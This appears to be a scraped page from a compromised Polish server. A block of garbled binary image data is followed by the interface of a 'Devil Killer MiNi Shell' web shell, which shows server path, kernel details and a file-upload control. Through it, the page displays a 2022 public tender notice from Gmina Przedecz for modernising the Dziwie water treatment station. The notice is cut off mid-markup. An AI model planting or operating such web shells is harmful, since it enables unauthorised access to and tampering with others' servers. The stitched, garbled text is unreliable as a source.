JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20220518/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20220518/0016517401-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Modernizacja Stacji Uzdatniania Wody w Dziwiu </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA PRZEDECZ</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 311019326</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">pl. Wolności 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Przedecz</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">62-635</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">wielkopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL414 - Koniński</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">urzad@przedecz.com.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://bip.przedecz.com.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Modernizacja Stacji Uzdatniania Wody w Dziwiu </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-3fdc7391-d681-11ec-9a86-f6f4c648a056</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00165174</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-05-18</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00033004/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.4 Modernizacja stacji uzdatniania wody w Dziwiu</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/przedecz <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/przedecz</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Uwaga! Przed przystąpieniem do składania oferty, Wykonawca jest zobowiązany zapoznać się z Instrukcją korzystania z Platformy zakupowej. Korzystanie z Platformy jest nieodpłatne.<br/>Komunikacja w postępowaniu o udzielenie zamówienia odbywa się przy użyciu środków komunikacji elektronicznej, za pośrednictwem platformy zakupowej pod adresem https://platformazakupowa.pl/pn/przedecz zwanej dalej Platformą.<br/>Na tej stronie udostępniane będą zmiany i wyjaśnienia treści SWZ oraz inne dokumenty zamówienia bezpośrednio związane z przedmiotowym postępowaniem o udzielenie zamówienia.<br/>Zamawiający, prowadząc postępowanie zgodnie z rozporządzeniem Prezesa Rady Ministrów<br/>z dnia 30 grudnia 2020 roku w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie <br/>(Dz. U. z 2020 poz. 2452), zwane dalej rozporządzeniem, odnosi się do rozporządzenia Rady Ministrów z dnia 12 kwietnia 2012 roku w sprawie Krajowych Ram Interoperacyjności, minimalnych wymagań dla rejestrów publicznych i wymiany informacji w postaci elektronicznej oraz minimalnych wymagań dla systemów teleinformatycznych, które zawiera katalog dopuszczalnych formatów przesyłanych danych.<br/><br/>Informacje o sposobie porozumiewania się zamawiającego z wykonawcami oraz przekazywania oświadczeń lub dokumentów:<br/>a) Osobami uprawnionymi do kontaktu ze strony Zamawiającego z Wykonawcami są:<br/>- w sprawach merytorycznych i formalnych wyjaśnień udzielają:<br/>Witold Siwiński- Burmistrz Miasta i Gminy Przedecz<br/>Wojciech Dalak, Magdalena Bawej, Krzysztof Szewczyk - Dział Zamówień Publicznych, Inwestycji Gminnych i Dróg, Urząd Miasta i Gminy Przedecz, Plac Wolności 1, <br/>62-635 Przedecz, tel. 63 27 38 467 wew. 131, fax: 63 27 38 467 (od poniedziałku do piątku <br/>w godz. 7:15 – 15:15).<br/>- w przypadku pytań w sprawie funkcjonowania Platformy Zakupowej należy skorzystać <br/>z pomocy Centrum Wsparcia Klienta, które udziela wszelkich informacji związanych <br/>z procesem składania ofert, rejestracji czy innych aspektów technicznych platformy, dostępne codziennie od poniedziałku do piątku w godz. od 8:00 do 17:00 pod nr tel. 22 101 02 02.<br/>b) W sytuacjach awaryjnych np. w przypadku awarii Platformy Zakupowej, Zamawiający dopuszcza komunikację za pomocą poczty elektronicznej na adres Zamawiającego w sprawie postępowań o udzielenie zamówienia: zamowienia@przedecz.com.pl<br/>c) W celu skrócenia czasu udzielenia odpowiedzi na pytania preferuje się, aby komunikacja między zamawiającym a wykonawcami, w tym wszelkie oświadczenia, wnioski, zawiadomienia oraz informacje, przekazywane są w formie elektronicznej za pośrednictwem platformazakupowa.pl i formularza „Wyślij wiadomość do zamawiającego”.<br/><br/>Zamawiający informuje, że w toku niniejszego postępowania zgodnie z art. 61 ust. 2 ustawy PZP komunikacja ustna dopuszczalna jest jedynie w odniesieniu do informacji, które nie są istotne. Zasady dotyczące sposobu komunikowania się zostały przez Zamawiającego umieszczone w SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">13.1. Zamawiający oświadcza, że spełnia wymogi określone w rozporządzeniu<br/>Parlamentu Europejskiego i Rady (UE) 2016/679 z 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z<br/>przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne<br/>rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 4 maja 2016 r.), dalej: RODO, tym samym dane osobowe podane przez<br/>wykonawcę będą przetwarzane zgodnie z RODO oraz zgodnie z przepisami krajowymi.<br/>13.2. Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w<br/>sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych<br/>oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE<br/>L 119 z 04.05.2016, str. 1), dalej „RODO”, informujemy, że:<br/>• Administratorem Pani/Pana danych osobowych jest Burmistrz Miasta i Gminy Przedecz, Plac Wolności 1, 62-635 Przedecz;<br/>• Administrator wyznaczył Inspektora ochrony danych osobowych w Gminie Przedecz.<br/>W sprawie pytań dotyczących sposobu i zakresu przetwarzania Pani/Pana danych osobowych oraz przysługujących Pani/Panu<br/>uprawnień, może się Pani/Pan skontaktować się z Inspektorem Ochrony Danych się poprzez e-mail: mienie2@przedecz.com.pl<br/>Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o<br/>udzielenie zamówienia publicznego nr RGWI.271.1.7.2022 pn. „Modernizacja Stacji Uzdatniania Wody w Dziwiu” prowadzonym wtrybie podstawowym bez negocjacji, na podstawie art.275 pkt 1 ustawy Pzp.<br/>13.3. W związku z przetwarzaniem danych w celu, o którym mowa w ust. 16.2. odbiorcami Pani /Pana danych osobowych mogą być:<br/>1) podmioty uprawnione do tego na podstawie przepisów prawa;<br/>2) podmioty, które na podstawie stosownych umów podpisanych z Zamawiającym są współadministratorami danych osobowych lub<br/>przetwarzają w imieniu Zmawiającego dane osobowe ,jako podmioty przetwarzające;<br/>3) osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 74 ustawy Pzp.<br/>13.4. Zamawiający nie ma zamiaru przekazywać Pani/Pana danych osobowych do państwa trzeciego lub organizacji<br/>międzynarodowych.<br/>13.5. Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ustawy Pzp. przez okres 4 lat od dnia zakończenia<br/>postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas<br/>trwania umowy.<br/>Pozostałe informacje znajdują się w SWZ postępowania.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">RGWI.271.1.7.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zakres zadania obejmuje: <br/>	Wymianę istniejącego zestawu pomp sieciowych tłoczących wodę uzdatnioną na zestaw oparty na pompach pionowych wielostopniowych zabudowanych na wspólnej ramie ze stali nierdzewnej wraz z dostawą dedykowanej rozdzielni sterowniczej – zestaw o minimalnej wydajności 70 m3/h. <br/>	Wykonanie niezbędnych prac budowlanych pod zestaw pomp, <br/>	Wykonanie niezbędnych instalacji elektrycznych, zasilających sterowniczych i tras kablowych niezbędnych do właściwego funkcjonowania obiektu.<br/>	Dostawa, montaż, podłączenie i rozruch agregatu prądotwórczego o mocy nie mniejszej niż 80 kVA + UKŁAD SZR PRZYSTOSOWANY DO PRACY AUTOMATYCZNEJ Z AGREGATEM, Uzyskanie niezbędnych pozwoleń <br/>i opracowanie dokumentacji współpracy agregatu prądotwórczego <br/>z siecią (dostawcą energii elektrycznej w Kaliszu.)<br/><br/>W ramach realizacji zadania należy zaprojektować, dostarczyć, zamontować i uruchomić zestaw pomp sieciowych tłoczących wodę do sieci wodociągowej na czynnej Stacji Uzdatniania Wody (Obecny układ składa się z - 3 pompy II stopnia 65 PJM 200 + jedna rezerwowa : ( Q : 700 l/min; H 46-48 m) zapewnić ciągłość dostawy wody dla odbiorców z możliwością przerwy na przełączenie układu nie dłużej niż do 12 godz. po wcześniejszym uzgodnieniu z jednostka eksploatującą obiekt) . Zestaw pomp sieciowych zaprojektować i wykonać w oparciu o pompy pionowe wielostopniowe. Zestaw pompowy powinien składać się z min. 4 pomp, w zależności od wyników przeprowadzonej analizy zapotrzebowania na wodę do celów bytowych (należy uwzględnić okresy szczytowych rozbiorów) Wykonawca powinien dokonać doboru pomp zestawu w taki sposób aby zabezpieczyć także zapotrzebowanie na wodę do celów przeciwpożarowych ( wydajność i wysokość ciśnienia zgodnie z obowiązującym Rozporządzeniem Ministra Spraw Wewnętrznych i Administracji z dnia 24 lipca 2009 r. w sprawie przeciwpożarowego zaopatrzenia w wodę oraz dróg pożarowych ). Każda z pomp zestawu pompowego powinna być wyposażona w przetwornicę częstotliwości. Każda z pomp zestawu pompowego powinna posiadać indywidualną przepustnicę międzykołnierzową na przyłączu ssącym i tłocznym, na przyłączu tłocznym należy zabudować kompensator gumowy kołnierzowy oraz zawór zwrotny klapowy międzykołnierzowy. Na kolektorze ssącym min. DN 150 mm zestawu pompowego zamontować manuwakuometr tarczowy oraz kamertonowy czujnik obecności cieczy oraz kran probierczy. Na kolektorze tłocznym min. DN 125 mm zestawu pompowego zabudować manometr tarczowy 0-10 bar z kurkiem manometrycznym, elektroniczny przetwornik ciśnienia, wyłączniki ciśnieniowe ( 2 szt.) oraz naczynie przeponowe 25 l. (2 szt.). Kolektor ssący i tłoczny powinny być połączone z siecią zasilającą i odbierającą wodę przy pomocy kompensatorów gumowych kołnierzowych. Należy zaprojektować i wykonać układ w taki sposób aby możliwe było odcięcie kolektora ssącego i tłocznego przy pomocy przepustnic miedzykołnierzowych. Za kolektorem tłocznym na rurociągu prowadzącym wodę do sieci wodociągowej zabudować należy wodomierz śrubowy z nadajnikiem impulsów.<br/>Ramę zestawu pompowego wykonać z profili zamkniętych wykonanych ze stali nierdzewnej co najmniej gatunku AISI 304. Rama zestawu pompowego powinna być wyposażona w wibroizolatory talerzowe tłumiące drgania i zmniejszające hałas powstający w efekcie tych drgań. Wibroizolatory talerzowe jednocześnie pozwalają a regulację wysokości montażowej zestawu pomp sieciowych oraz odpowiednie wypoziomowanie zestawu. <br/>Zestaw wyposażony w szafkę sterowniczą z zaawansowanym technicznie i przyjaznym dla użytkownika sterowaniem. Szafa sterownicza wyposażona we wszystkie niezbędne podzespoły jak: sterownik, wyłącznik główny, styczniki , moduły IO i okablowanie, szafa przystosowany do montażu wolnostojącego lub naściennego. Zestaw fabrycznie wyposażony w przetwornik ciśnienia zamontowany na kolektorze tłocznym i wpięty do sterownia <br/>Kompletny zestaw podnoszenia ciśnienia zgodny ze standardem DIN 1988/T5.<br/>Zestaw wyposażony ma być w pompy z elektronicznie komutowanym silnikiem z magnesami trwałymi o niezwykle wysokiej sprawności. Całkowita klasa sprawność silnika, w tym przetwornicy częstotliwości, odnosi się do poziomu IE5 wg IEC60034-31. Utrzymuje stałe ciśnienie przez ciągłą regulację prędkości pomp. Osiągi zestawu są dopasowywane do zapotrzebowania przez wył/zał wymaganej liczby pomp i pracę równoległą załączonych pomp. Zamiana pomp automatyczna w zależności od obciążenia, czasu i zakłócenia.. Wszystkie elementy pomp stykające się z tłoczoną cieczą mają być wykonane ze stali nierdzewnej EN DIN 1.4301. Podstawa pompy, podstawa silnika-żeliwo z powłoką CCE, uszczelnienie wału-bezobsługowe uszczelnienie kasetowe HQQQE/SIC/SIC/EPDM. Wymianę orurowania technologicznego wody uzdatnionej rurociąg ssący i rurociąg tłoczny poza obrys fundamentu budynku SUW i włączenie w czynny rurociąg z rur PCV. Orurowanie wykonać z rur i kształtek ze stali nierdzewnej gatunku AISI 304 lub lepszej.<br/>W celu ułatwienia doboru zestawu pomp podajemy poniżej parametry eksploatacyjne SUW Dziwie:<br/>Q min. Noc- 7 m3/h<br/>Q max latem – 72 m3/h <br/>Q max doba= 700 m3<br/>H = 46-48 mH2O<br/>Ciśnienie na wyjściu za zestawem 0,43 MPa<br/>Napływ około 0,5 msw <br/><br/>Zestaw pompowy wyposażony w poniższe funkcje:<br/>-inteligentny sterownik wielopompowy <br/>- utrzymanie stałego ciśnienia przez ciągłą regulację prędkości obrotowej pomp.<br/>- regulator PID<br/> -stałe ciśnienie wartości zadanej niezależnie od ciśnienia wlotowego.<br/> - praca zał./wył. przy małych przepływach.<br/> - automatyczne kaskadowe sterowanie pomp w celu utrzymania optymalnej sprawności.<br/> -wybór min. czasu pomiędzy zał./wył., automatycznej zamiany i priorytetu pomp.<br/> -funkcja automatycznego testu pomp niepracujących.<br/> -wybór pompy rezerwowej<br/> -możliwość wyboru czujnika rezerwowego<br/> - czujnik dodatkowy (możliwość przełączenia na dodatkowy czujnik / inną wartość zadaną).<br/>Multi-sensor (do 6 czujników wpływających na wartość zadaną.<br/> - praca ręczna<br/> - zewnętrzny wpływ na wartość zadaną.<br/> - funkcja rejestrów Log.<br/> - wartość zadana rampy<br/> -funkcje cyfrowego zdalnego sterowania:<br/> zał./wył. zestawu<br/> maks., min. lub punkt pracy użytkownika<br/> do 6 różnych wartości zadanych<br/> - wejścia i wyjścia cyfrowe mogą być konfigurowane indywidualnie<br/> - funkcje kontroli pomp i zestawu: minimalne i maksymalne granice wartości aktualnych<br/> - ciśnienie wlotowe<br/> - monitoring zaworu zwrotnego<br/> - zabezpieczenie silnika<br/> - monitoring czujników przed awarią.<br/> - alarm log z 24 zapamiętanymi alarmami<br/> - funkcje wyświetlacza i sygnalizacji:<br/> -kolorowy wyświetlacz z podświetleniem<br/> -zielona dioda sygnalizacji pracy i czerwona dioda sygnalizacji zakłócenia<br/> -bezpotencjałowe styki przełączające pracy i zakłócenia.<br/>Zamówienie obejmuje dostawę wraz z montażem i rozruchem i przeszkoleniem pracownika- konserwatora SUW.<br/>Zakres zadania obejmuje również dostawę i montaż Agregatu prądotwórczego: <br/>Zastrzeżenia:<br/>Produkt spełniający normy i dyrektywy:<br/> Dyrektywa Maszynowa 2006/42/WE<br/> Dyrektywa Niskonapięciowa 2014/35/WE<br/> Kompatybilność Elektromagnetyczna 2014/30/WE<br/> Dyrektywa Hałasowa 2000/14/WE<br/> Dyrektywa Spalinowa 97/68/WE<br/> ISO 8528-1/2018, PN-ISO 8528-5/2018<br/> PN-EN ISO 8528-13:2016<br/> PN-EN 60204-1<br/>Moc znamionowa nie mniejsza niż 80 [kVA] <br/>Prąd znamionowy PRP [A] 115,0<br/>Częstotliwość [Hz] 50<br/>Napięcie [V] 400<br/>Emisja spalin non-emission<br/>Rodzaj paliwa Diesel (EN 590)<br/>Instalacja sterowania silnika[V] 12<br/>Wersja otwarta wyciszona<br/>STEROWNIK wyposażony:<br/>Intuicyjny interfejs graficzny<br/>Zegar czasu rzeczywistego z akumulatorem<br/>Kontrola zasilania sieciowego, automatyczny start generatora<br/>Dziennik zdarzeń: do 350 pozycji<br/>Pomiar wartości prądu w 3 fazach<br/>Pomiar wartości napięcia sieci i generatora<br/>Pomiar mocy czynnej, biernej i pozornej<br/>Licznik energii czynnej i biernej generatora<br/>Licznik czasu pracy, wielofunkcyjne, konfigurowalne liczniki<br/>Pomiar napięcia akumulatora<br/>Pełne zabezpieczenie silnika i prądnicy<br/>SILNIK PRĄDNICA:<br/>Napięcie znamionowe [V] 400<br/>Konstrukcja jednołożyskowa<br/>Regulacja obrotów mechaniczna Połączenie z silnikiem bezpośrednie<br/>Technologia bezszczotkowa<br/>Zgodnie z Dyrektywą 97/68/WE dotyczącą ograniczenia emisji<br/>zanieczyszczeń gazowych i pyłowych z silników spalinowych, montowanych<br/>w maszynach samojezdnych, nieporuszających się po drogach.<br/>Zgodnie z normą PN-ISO 8528-5/2018<br/><br/>Zamówienie obejmuje dostawę agregatu wraz z montażem i rozruchem i przeszkoleniem pracownika- konserwatora SUW. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45232430-5 - Roboty w zakresie uzdatniania wody</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45252120-5 - Roboty budowlane w zakresie zakładów uzdatniania wody</p> <p class="mb-0">45111300-1 - Roboty rozbiórkowe</p> <p class="mb-0">45232000-2 - Roboty pomocnicze w zakresie rurociągów i kabli</p> <p class="mb-0">45311000-0 - Roboty w zakresie okablowania oraz instalacji elektrycznych</p> <p class="mb-0">45453000-7 - Roboty remontowe i renowacyjne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">240 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze najkorzystniejszej oferty Zamawiający będzie kierował się następującymi kryteriami i<br/>odpowiadającymi im znaczeniami oraz w następujący sposób będzie oceniał spełnienie kryteriów: Każda z dwóch części przedmiotu<br/>zamówienia zostanie oceniona odrębnie na podstawie tych samych – niżej wymienionych- kryteriów oceny ofert</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji i rękojmi dla prac montażowych objętych przedmiotem zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 